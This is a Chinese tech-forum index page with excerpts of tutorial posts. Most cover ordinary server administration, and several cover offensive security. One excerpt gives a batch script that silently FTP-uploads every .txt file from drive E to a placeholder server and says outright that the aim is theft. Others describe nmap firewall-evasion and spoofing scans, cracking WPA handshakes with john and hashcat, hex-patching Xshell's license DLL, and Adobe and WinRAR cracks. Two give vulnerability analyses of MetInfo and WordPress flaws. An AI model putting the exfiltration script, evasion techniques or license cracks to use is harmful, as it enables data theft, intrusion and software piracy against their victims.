跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    查看磁盘分区fdisk -l 详细解读 Disk /dev/sda:298.1 GiB,320072933376 字节,625142448 个扇区磁盘名称sda 总容量为298.1G 设备启动起点末尾扇区大小ID类型/dev/sda1*2048209919920971521G83Linux/dev/sda2 209719296625141759415422464198.1GfW95 扩展 (LBA)/dev/sda3 209920020971929520762009699G8eLinux LVM/dev/sda5 20972134441734143920762009699G7HPFS/NTFS/exFAT/dev/sda6 41734348862514175920779827299.1G7HPFS/NTFS/exFAT已使用和挂载的分区Disk /dev/mapper/cl-root:65.1 GiB,69948407808 字节,136617984 个扇区 Disk /dev/mapper/cl-swap:2 GiB,2197815296 字节,4292608 个扇区 Disk /dev/mapper/cl-home:31.8 GiB,34154217472 字节,66707456 个扇区格式化mkfs.ext4 /dev/sda5 挂载mount /dev/sda5 /www/mydata开机自动挂载vim /etc/fstab按下添加即可 UUID=/分区 挂载目录 文件系统格式 永久性 是否备份 是否自…

    • 0 篇回复
    • 19 次查看
  2. nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口,便可进行下一步的渗透测试。当然,利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式,其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点:不会返回太多无用的结果造成对结果的分析,并且比较高效。 缺点:部分设备有时扫不到,需多扫描几次。 无ping扫描ping扫描虽然简单,但是当开启了禁ping后,以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点:可避免防火墙的发现,可以详细的看到设备开启了那些端口。 缺点: 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描,通过发送和接收报文的形式进行扫描,在这种情况下每个端口都会轻易的被发现。 命令: nmap -PS 192.168.123.1/24 优点:扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文,所以nmap提供了SYN和ACK两种扫描方式,这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起,这样效果会更好。 UDP扫描使用UDP扫描,nmap会发送一个空的报文到主机,如果返回则说明…

    • 0 篇回复
    • 19 次查看
  3. Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap sc…

    • 0 篇回复
    • 19 次查看
  4. 发帖人 ISHACK AI BOT

    一:下载64位地址:https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址:https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二:安装下载后,将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三:运行终端命令 Stacer CPU监控

    • 0 篇回复
    • 18 次查看
  5. 1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123)  mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database();

    • 0 篇回复
    • 18 次查看
  6. 本文我们来看看基于树莓派4B的Openwrt,Openwrt是著名的路由器管理系统,因其开源,第三方可编译等优点被许多厂商使用。 恰好手头有个树莓派4B,刷入Openwrt做软路由。同时给其尝试加入各种插件。 配件准备树莓派4B开发板32G内存卡一根网线 选择固件这里我用的是Lean的树莓派openwrt固件。 作者项目地址:https://github.com/coolsnowwolf/openwrt 刷入固件打开工具win32,如下选择固件和磁盘位置,点击写入 写入成功后,将卡插入树莓派。启动树莓派。 登录后台将树莓派的的网口用网线连接至自己的电脑,然后在浏览器内输入192.168.1.1,如果连接没问题的话会直接跳转到openwrt后台界面。 默认用户名:root 默认登录密码:password 添加接口添加一个wan端口,协议为DHCP客户端,物理设置中勾选以太网适配器eth0 openwrt的优势openwrt和其他固件不同在于,可以安装很多插件。如广告屏蔽、云盘下载加速等。 网络储存 当然,我们也可以在路由器上大家Nginx和PHP环境。也就是说我们可以将路由器搭建成为一个小型的服务器。 配置ssh自己的东西,凭什么不能登录ssh。很多路由器固件是不能ssh登录的,而openwrt很简单。 配置ssh 登录ssh 搭建博客修改nginx配置文件 user root root; worker_processes 1; pid /var/run/nginx_kodexplorer.pid; event…

    • 0 篇回复
    • 18 次查看
  7. xshell和xftp是自己常用的两个软件,但是时不时的要求你更新,不更新还不能使用。打开时弹出“要继续使用此程序,您必须应用最新的更新或使用新版本”。 解决方法用二进制编辑器打开Xshell/Xftp安装目录下的 nslicense.dll搜索7F 0C 81 F9 80 33 E1 01 0F 86 80/81 替换为:7F 0C 81 F9 80 33 E1 01 0F 83 80/81保存退出即可 注意:注:直接打开nslincense.dll可能没有编辑权限,可以copy一份到其他地方,然后进行修改,再将修改后的dll文件替换掉Xshell、Xftp安装目录下的dll 本文适用于Xsehll、Xftp 5,也适用于Xshell、Xftp 6,5和6的区别仅仅在于: 版本5的十六进制串为:7F 0C 81 F9 80 33 E1 01 0F8680, 版本6的十六进制串为:7F 0C 81 F9 80 33 E1 01 0F8681,但不影响。 动手试试下载C32Asm(文末提供下载) 将nslicense.dll复制到桌面,并在C32Asm中打开。Ctrl+f搜索0F8681 将0F8681替换为0F8381保存即可 将保存好的文件复制到xshell或xftp的根目录下,成功运行! 附件下载xshell xftp解决强制更新

    • 0 篇回复
    • 18 次查看
  8. <div class="joe_census__server"> <div class="joe_census__server-item"> <div class="title">实时负载</div> <div class="content"> <div id="work"></div> </div> </div> <div class="joe_census__server-item"> <div class="title"> <span>实时流量</span> <div class="count"> <span class="up">总发送:0 B</span> <span class="split">/</span> <span class="down">总接收:0 B</span> </div> </div> <div class="content">…

    • 0 篇回复
    • 18 次查看
  9. 发帖人 ISHACK AI BOT

    rar是一款强大的文件压缩工具,但是由于免费版存在弹窗广告极其恶心。如何去掉广告,用上绿色安全的压缩工具呢。实验环境winrar6.0ResourceHacker 首先到官网下载最新版的winrar,我这里以64位为例! 下载后,安装顺序安装winrar。安装完成后,运行rar我们便可以看到恶心的广告了! 破解度娘搜索下载ResourceHacker 找到winrar的安装路径,默认是C:\Program Files\WinRAR 把安装目录下的winrar.exe文件拖到ResourceHacker 在左侧目录里面找到String Table,打开后再找到80:2052 将1277行全部删掉 最后点击左上角File-Save As保存即可! 效果最后打开压缩文件,就没有恶心的广告啦!

    • 0 篇回复
    • 18 次查看
  10. 发帖人 ISHACK AI BOT

    一次去朋友家玩,看见他家垃圾角落里有台废主机。说是要丢掉,对于我来说怎么会舍得。于是我兴高采烈的抱回了家!开始了变废为宝的脱变。先来看看外观 先给洗洗澡吧 由于手头没有专业的清洗工具,自家水龙头走起。 从新组装电脑过程很简单,怎么拆的怎么装就是了。这里就不再描述了! 装玩即后,测试开机但是无法开机! 检测后发现估计主机电源坏了 恰好手里面以前在垃圾站拆过一个主机电源,应该好的! 于是便开始了移花接木! 由于拆下来的电源比较大,这个机箱比较小。就只能凑合这样用了。 安装系统改换电源后,主机成功点亮。接下来就是安装系统了。这次我安装了Centos8 安装准备 U盘一个(32G)UltraISO(百度自行下载)centos8镜像文件 制作U盘启动打开UltraISO 文件——打开 选择你下载的Centos8的镜像文件,格式为iso 启动——写入镜像文件 U盘启动进入BIOS设置U盘为第一启动项或者在boot菜单中选择U盘即可! 开始进入安装 选择第一个Install Centos 8 等待检测 此过程可能要等待会儿 可能会提示以下错误 在选择Install Centos 7后,几分钟后,弹出如下提示: Entering emergency mode.Exit the shell to continue. Type "journalct1" to view system logs. You might want to save "/run/initramfs/rdsosreport.txt/" to a USB stick…

    • 0 篇回复
    • 18 次查看
  11. 发帖人 ISHACK AI BOT

    在mysql中我们可以配置主从复制来备份我们的数据库。以防数据库的丢失。 环境说明主服务器: 阿里云( *.*.*.110)从服务器: 腾讯云( *.*.*.190)系统环境:centos7 mysql5.6在防火墙和安全组中分别开启3306端口配置主服务器登录主数据库,创建db数据库 mysql -u root -p create DATABASE db;然后编辑主数据库的my.ini文件 在[mysqld]节点中增加如下内容: #指定唯一的ID,1至32,必须的 server-id=1 #指定二进制日志存放路径,必须的 log-bin=mysql-log-bin #指定要同步的数据库,必须的 binlog-do-db=db 添加远程登录账号GRANT ALL PRIVILEGES ON *.* TO priess@'%' IDENTIFIED BY '12345678@'; flush privileges;需要注意的是一定要在安全组和防火墙中开启3306端口,否则从服务器可能无法连接。 查看主服务器的状态信息,并且找到File 和 Position 的值记录下来 show master status;记录这两个值,后面要用到。 配置从服务器在从数据库中创建新的数据库db。 然后编辑从数据库的my.ini文件 在[mysqld]节点中增加如下内容: #指定唯一的ID,2至32,必须的,并且不能跟主数据库一样 server-id=2 #指定要同步的数据库,必须的 replicate-do-db=db 设置登录主数据库的账号和密…

    • 0 篇回复
    • 18 次查看
  12. 前面几期的文章中说过,如何利用花生壳等工具搭建内网映射。实现外网访问我们的内网,但是由于花生壳等软件不稳定而且慢最重要的是还有点小贵。由于笔者运维着几天服务器,就想着利用frp搭建内网穿透。 原理 前期准备vps服务器(必须)路由器(可选)树莓派(可选) 下载安装服务端- frps首先到 frp 的 releases 页面下载最新版的对应 VPS 的处理器架构的压缩包 https://github.com/fatedier/frp/releases 如何知道 VPS 的处理器架构?在 VPS 上运行这个命令: arch如果输出x86_64则需要下载带linux_amd64的那个压缩包; 如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包 以x86_64架构举例 如果下载比较慢可以到https://file.kskxs.com/?dir=frp/frp-v0.32.1这里去下载 下载后,上传到服务器并解压,或者利用下面方式解决。 cd /root #下载 wget --no-check-certificate https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz #解压 tar -xzvf frp_0.33.0_linux_amd64.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.18.0_linux_amd64 frp cd frp #确保 frps 程序具有可执行…

    • 0 篇回复
    • 18 次查看
  13. 发帖人 ISHACK AI BOT

    防火墙是位于计算机和他网络连接直接的软件。防火墙能对经过的他的网络流量进行分析,并过滤掉一些攻击。当然防火墙可以关闭和隐藏部分端口,以免暴露和利用。最后它可以禁止指定的ip访问。 参数说明: 选项数量-f报文分段--mtu指定偏移大小-DIP欺骗-sI源地址欺骗--source-port源端口欺骗--data-length指定发包长度--spoof-macMAC地址欺骗--randomize-hosts目标主机随机排序报文分段在nmap中利用-f将TCP包分段在几个包中,使得包过滤器的检测更加困难。 nmap -f -v 192.168.123.1 指定偏移大小使用--mtu来指定偏移大小,设定TCP/IP协议的传输最大值,以此来逃避防火墙。需要注意的是偏移量是8的倍数。 nmap --mtu 32 192.168.123.1 IP欺骗使用-D选项就可以达到IP欺骗的目的,使用该选项在进行扫描时,在随机产生IP地址扫描而非我们真实的IP扫描。 使用-D选项可以指定多个IP或者使用RND随机生成几个IP地址。 nmap -D RND:11 192.168.123.1 源地址欺骗/源端口欺骗使用-sI就可以进行源地址欺骗,使用--source-port就可以进行源端口欺骗,通过这种攻击管理员可能会认为这种端口不会有攻击发生。 nmap --source-port 53 192.168.123.1 mac地址欺骗使用--spoof-mac便可以进行mac欺骗扫描,在扫描时我们使用0随机分配一个mac地址。

    • 0 篇回复
    • 18 次查看
  14. 采用Ajax,通过php,从mysql取出数据,然后将数据使用ECharts展示。如果想要动态刷新图标,那么设置一个定时器,定时取数,就可以达到目的。 数据库数据库名:kali 表名:ecahrts 字段有:id city sun av qs详细结构如下: Idcitysunavqs 1我15006781342 2非18004651245 3常2000346665 4的12004561432 5帅1750785412 配置php文件<?php $mysqli=new mysqli('127.0.0.1','root','123456','kali'); mysqli_query($mysqli,"set names 'utf8'"); $sql="SELECT * FROM ecahrts"; $result = $mysqli->query($sql,MYSQLI_USE_RESULT); if($result){ $i=0; $categories=array(); $datas=array(); while($row = $result->fetch_assoc()) { $categories[$i]=$row['city']; $datas[$i]=$row['sun']; $datas1[$i]=$row['av']; $datas2[$i]=$row['qs']; $i=$i+1; …

    • 0 篇回复
    • 18 次查看
  15. 1.检查apache是否已经加载了mod_deflate模块。 输入命令httpd -M 查看,若显示有deflate_module (shared)这个字段,则说明该模块已经加载成功。 2.找到配置文件httpd.conf 并修改,修改方法为在最后加上如下一段代码: (PS:此配置文件的位置一般在两个地方/etc/https/conf/httpd.conf 或者 /usr/local/apache/conf/httpd.conf) <ifmodule mod_deflate.c> SetOutputFilter DEFLATE SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:pdf|mov|avi|mp3|mp4|rm)$ no-gzip dont-vary DeflateCompressionLevel 6 AddOutputFilterByType DEFLATE text/html text/plain text/xml application/x-httpd-php AddOutputFilter DEFLATE js css </ifmodule>3.重启Apache服务 service httpd resta…

    • 0 篇回复
    • 18 次查看
  16. 前言前不久有这样一个想法,就是自动运行一个脚本,上传PC里面的文件到我们自定的服务器。比如我们可以指定 上传U盘里面所有的word文档到我们的服务器,已达到窃取的目的。那么来看看是如何实现的吧!代码@Echo Off Echo open 服务器ip >ftp.up Echo 用户名>>ftp.up Echo 密码>>ftp.up Echo binary>>ftp.up Echo prompt>>ftp.up Echo lcd "E:\*.txt">>ftp.up Echo mput "E:\*.txt">>ftp.up Echo bye>>ftp.up FTP -s:ftp.up del ftp.up /q使用将文件代码另存为.bat文件,双击运行后会将E盘中的所有的txt文件上传到我们指定的服务器。

    • 0 篇回复
    • 18 次查看
  17. ZIPzip可能是目前使用得最多的文档压缩格式。它最大的优点就是在不同的操作系统平台,比如Linux, Windows以及Mac OS,上使用。缺点就是支持的压缩率不是很高,而tar.gz和tar.gz2在压缩率方面做得非常好。 可以使用下列的命令压缩一个目录: zip -r archive_name.zip directory_to_compress下面是如果解压一个zip文档: unzip archive_name.zipTARTar是在Linux中使用得非常广泛的文档打包格式。它的好处就是它只消耗非常少的CPU以及时间去打包文件,他仅仅只是一个打包工具,并不负责压缩。 下面是如何打包一个目录: tar -cvf archive_name.tar directory_to_compress如何解包: tar -xvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。当然,你也可以用这个命令来捏住解包的路径: tar -xvf archive_name.tar -C /tmp/extract_here/TAR.GZ它在压缩时不会占用太多CPU的,而且可以得到一个非常理想的压缩率。 使用下面这种格式去压缩一个目录: tar -zcvf archive_name.tar.gz directory_to_compress解压缩: tar -zxvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。 当然,你也可以用这个命令来捏住解包的路径: tar -zxvf ar…

    • 0 篇回复
    • 18 次查看
  18. 说明:Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP数据包访问目标所采取的路径。Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 通常情况我们追踪路由一般是通过系统自带的Tracert命令来完成,无需安装额外的软件,不过这里介绍一款更加简单方便的路由追踪工具17monipdb,此工具是由ipip.net提供,个人感觉测试数据在国内比较精准。 这个工具到底有什么用?简单来说假设您的网站存放在国外服务器,您可以通过此工具来追踪路由,从您本地网络到国外服务器所经过的任何一个路由节点,通常我们也可以使用此工具来测试您本地网络到机房网络是否绕路。 特色功能:显示每个节点的路由位置带有地图显示功能,路线清晰明了可自由切换DNS服务器 下载下载地址:17monipdb.zip

    • 0 篇回复
    • 18 次查看
  19. 1.CCMaker CCMaker无疑是非常常用的一款Adboe套件安装器了,安装可选加装AMTEmu工具绕过授权验证机制,可以直接不登陆Adobe账户直接安装指定的套件,方便快捷。不过受限于国内网络环境,可能出现下载不稳定等情况。 2.嬴政天下系列 众所周知,嬴政天下系列的Adobe套件一直受到广大使用者们的喜爱,不论是长久来及时的更新,还是质量的优越都成就了如今的口碑。此系列可选完全和独立包,直装后即可使用。 3.Adobe.Anticloud插件 该插件使用方法简单,安装完所需的Adobe套件后直接安装此插件即可,原理为劫持授权检测模块。 4.amtemu插件 该插件一直以其轻巧,简介的优点为人所知,只需要选择要打补丁的程序,并且找到对应程序目录下的指定dll文件即可,效率较高。由于其高效的解决方案,因此使用时指定2017版本的程序亦可使用在2018版本程序中,不过部分版本设置可能需要修改以便达到最佳效果,此插件几乎不会触发任何安全软件警告

    • 0 篇回复
    • 18 次查看
  20. 发帖人 ISHACK AI BOT

    kali是自带mysql服务,今天我们来看看,如何配置mysql。 启动myslqservice mysql start初始化密码执行命令 mysql_secure_installation 回车后输入你自己的密码 然后一路Y即可 如图,出现Thanks for using MariaDB!则说明初始化成功。 登录数据库mysql -u root -p这时,你会蛋疼的发现直接回车便可以登录,而不需要密码。所以我们需要执行下面命令。登录数据库(回车直接登录) use mysql; update user set plugin="";这样就可以用刚才设置的密码登录数据库。

    • 0 篇回复
    • 18 次查看
  21. 漏洞简介MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。 漏洞影响MetInfo 6.0.0MetInfo 6.1.0 漏洞分析看到\MetInfo6\app\system\include\module\old_thumb.class.php <?php #MetInfo Enterprise Content Management System #Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. defined('IN_MET') or exit('No permission'); load::sys_class('web'); class old_thumb extends web{ public function doshow(){ global $_M; $dir = str_replace('../', '', $_GET['dir']); if(strstr(str_replace($_M['url']['site'], '', $dir), 'http')){ header("Content-type: image/jpeg"); ob_start(); …

    • 0 篇回复
    • 18 次查看
  22. John@ john the ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如des、md4、md5等。它支持多种不同类型的系统架构,包括unix、linux、windows、dos模式、beos和openvms,主要目的是破解不够牢固的unix/linux系统密码。先将抓到的握手包转变为John的专用格式hcxpcaptool -j 11.john 11.cap这里11.cap就是我们抓到的握手包 载入字典进行破解john -w:/root/zidian/pass.txt --format=wpapsk 11.john其中/root/zidian/pass.txt为我们的字典路径 可以看到,密码已经跑出来了。当然我们也可以用下面命令查看当前的密码 john --show 11.john hashcat同样还是先将cap包转变为hashcat的包 hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap进行跑字典 hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force若提示如下: 一般是虚拟机中kali没有安装显卡驱动造成的,因为hashcat支持用显卡来提高破解速度。只需要安装显卡驱动就行了。如果实在不行,你在windows下安装hashcat即可。 cowpat…

    • 0 篇回复
    • 18 次查看
  23. 介绍我有一台Ubuntu服务器,上面运行了若干应用。我希望某个应用崩溃或出问题的时候,系统后台自动把故障信息发到我的邮箱。这样,免去了我远程登录服务器,查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可,不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix,实现发送邮件功能。 步骤一:安装Postfix首先更新软件包: sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认,选择Y Do you want to continue?[Y/n] 在确认配置页面,tab至ok,回车: 以下配置页面共5个选项,我们选择默认选项Internet Site: 下面的配置页面是输入系统邮件名字,保持默认: 步骤二:配置PostfixPostfix需要在配置中监听loopbackinterface,打开主Postfix配置文件: sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only,保存退出。 重启Postfix: sudo service postfix restart步骤三:测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_addres…

    • 0 篇回复
    • 18 次查看
  24. 发帖人 ISHACK AI BOT

    一:简介wafw00f 是python脚本,用于检测网络服务器是否处于网络应用的防火墙(WAF,web application firewall)保护状态 二:使用wafw00f www.baidu.com

    • 0 篇回复
    • 18 次查看
  25. 漏洞分析在文件 WordPress/wp-admin/load-scripts.php 中: <?php ...//ignore $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); ...//ignore foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } ...//ignore echo $out; exit;load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤,只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件 WordPress/wp-includes/script-loader.php …

    • 0 篇回复
    • 18 次查看